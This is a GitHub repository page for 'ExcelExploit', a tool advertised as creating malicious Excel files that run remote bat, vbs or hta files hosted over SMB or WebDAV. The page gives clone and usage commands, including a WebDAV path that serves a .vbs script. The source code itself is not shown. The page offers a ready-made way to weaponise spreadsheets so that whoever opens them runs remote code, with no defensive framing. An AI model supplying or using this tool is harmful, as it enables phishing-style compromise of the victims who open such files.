Skip to content

Create Excel files that run a remote files hosted via SMB , WebDAV ...

License

Notifications You must be signed in to change notification settings

TukoG/ExcelExploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation


Excel Exploit



Create a malicious excel file that runs a remote file hosted via SMB or WebDAV

git clone https://github.com/TukoG/ExcelExploit
cd ExcelExploit

Usage

usage: main.py [-h] [--protocol exploit_file] [--output OUTPUT]

options:
  -h, --help            show this help message and exit

  --protocol exploit_file, -p exploit_file
                        file to execute (bat,vbs,hta) 

  --output OUTPUT, -o OUTPUT
                        output mal xlsx file (default: ./exloit.xlsx)
python3 main.py -h 
python main.py -p "file:///C:\test\test.vbs"
python main.py -p "file:///C:\test\test.vbs" -o mal.xlsx
python main.py -p "file:///\\127.0.0.1@8000/DavWWWRoot/test.vbs"

About

Create Excel files that run a remote files hosted via SMB , WebDAV ...

Topics

Resources

License

Stars

Watchers

Forks

Languages